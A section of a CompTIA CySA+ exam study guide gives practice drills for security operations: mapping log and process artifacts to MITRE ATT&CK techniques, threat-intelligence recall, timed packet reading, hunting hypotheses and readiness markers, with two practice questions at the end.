2.5 Practice Drills and Readiness Markers
Key Takeaways
- Readiness means you can classify any artifact — log, packet, process — and name the ATT&CK technique and next step.
- Drill log/packet reading until classification is reflexive; PBQs are timed and evidence-dense.
- Threat intelligence sharing standards (STIX/TAXII) and IoC types are quick, high-yield recall wins.
- A domain is ready only when mixed, unlabeled scenarios stay stable after a one-day break.
2.5 Practice Drills and Readiness Markers
Because Security Operations is 33% of CS0-003 and includes timed performance-based questions, readiness is measured by speed and accuracy reading real artifacts, not by recognition of definitions. Build drills that force active recall under a clock.
Drill 1: Artifact-to-technique flashcards
Make a two-column sheet. Left column: an artifact. Right column: the indicator, the MITRE ATT&CK tactic/technique, and the next analytic step.
| Artifact (left) | Classification + next step (right) |
|---|---|
| Burst of Event ID 4625 across many accounts | Password spraying → correlate to any 4624 success |
powershell -enc long base64 string | T1059.001 → decode the command, check 4688 parent |
| Outbound HTTPS at fixed 60s intervals | C2 beaconing (T1071) → check domain age/reputation |
| lsass.exe read by a non-system process | Credential dumping (T1003) → isolate, capture memory |
| Untouched honeytoken account just used | Confirmed intruder → escalate to incident response |
Drill 2: Threat-intelligence quick recall
These are cheap points if memorized:
- STIX (Structured Threat Information eXpression) is the format for describing threat data; TAXII (Trusted Automated eXchange of Intelligence Information) is the transport that shares it.
- Indicators of compromise (IoCs): file hashes, IP addresses, domains, URLs, registry keys, mutexes. The Pyramid of Pain ranks how costly each is for an attacker to change — hashes are trivial, TTPs are hardest.
- Threat actor types: nation-state/APT, organized crime, hacktivist, insider, script kiddie — each with different motivation and sophistication.
- Threat hunting is proactive: you form a hypothesis ("an adversary is using scheduled tasks for persistence") and search telemetry for it, rather than waiting for an alert.
Drill 3: Timed packet/log reading
In Wireshark or a log excerpt, practice answering in under 30 seconds: what protocol, what source and destination, what is abnormal. Learn the Wireshark display filters that save time — http.request, dns, ip.addr ==, tcp.flags.syn == 1 && tcp.flags.ack == 0 (to spot half-open scans), and frame contains for string hunting. In tcpdump, recognize -n (no name resolution), -X (hex/ASCII payload), and a basic host/port filter. PBQs supply dense data and reward analysts who triage fast and resist getting lost in irrelevant packets.
Drill 4: Attack-surface and hunting hypotheses
Threat hunting (objective 1.4) is hypothesis-driven, so practice writing testable hypotheses tied to ATT&CK and then naming the telemetry that proves or disproves each. Examples: "An adversary established persistence via a new service" → query for service-creation events; "Credential theft occurred" → query for non-system processes reading lsass; "C2 is hiding in DNS" → analyze query entropy and TXT volume. Pair this with attack surface management thinking — externally exposed services, unpatched internet-facing apps, and shadow IT are where hunts often start.
A hunt that finds nothing still has value: it builds detections and shrinks future uncertainty.
Readiness markers
| Marker | What "ready" looks like |
|---|---|
| Classification speed | Identify an artifact's indicator in under 30 seconds |
| ATT&CK mapping | Name the tactic and technique without the cheat sheet |
| Tool selection | Pick the right visibility source (cloud/host/network) reflexively |
| Distractor control | Explain why a familiar-but-wrong term does not fit the telemetry |
| Retention | Score stable on mixed, unlabeled scenarios after a one-day break |
You are ready for Domain 1.0 when you can take a scenario with no domain label, read the evidence, name the technique, choose the next step, and explain why the other options fail — and still do it after a day away from the material.
Drill 5: IoC and Pyramid-of-Pain recall
The Pyramid of Pain explains why some indicators matter more. From easiest-for-the-attacker-to-change to hardest: hash values → IP addresses → domain names → network/host artifacts → tools → tactics, techniques, and procedures (TTPs). Hunting on hashes catches yesterday's sample; detecting on TTPs forces attackers to rebuild their playbook and delivers durable defense. Drill yourself to place a given indicator on the pyramid and to explain its detection value.
Pair this with the diamond model of intrusion analysis (adversary, capability, infrastructure, victim) and the Cyber Kill Chain (reconnaissance through actions on objectives); CySA+ may ask which framework best describes a given analytic goal — ATT&CK for behavior mapping, kill chain for staged phases, diamond model for relating the four core features of an event.
Drill 6: Tool-to-task mapping under pressure
Write a rapid-fire quiz that names a question and demands the tool: "who deleted the cloud storage bucket?" → cloud audit log; "what did this binary do at runtime?" → sandbox/dynamic analysis; "is this host beaconing?" → NetFlow plus EDR; "is this domain malicious?" → threat-intel lookup plus WHOIS age; "what process opened this network connection?" → EDR or netstat/Sysmon. Reflexive tool selection is one of the most reliable signals that you are ready, because it proves you understand which layer holds which evidence rather than guessing from a familiar product name.
Re-run all six drills as a mixed, timed set in your final week and treat any sub-80% block as the area to revisit before test day.
A PowerShell process executes an encoded command that downloads a payload and injects code into a running explorer.exe. Which combination of MITRE ATT&CK techniques is demonstrated?
In a threat-intelligence sharing workflow, what is the relationship between STIX and TAXII?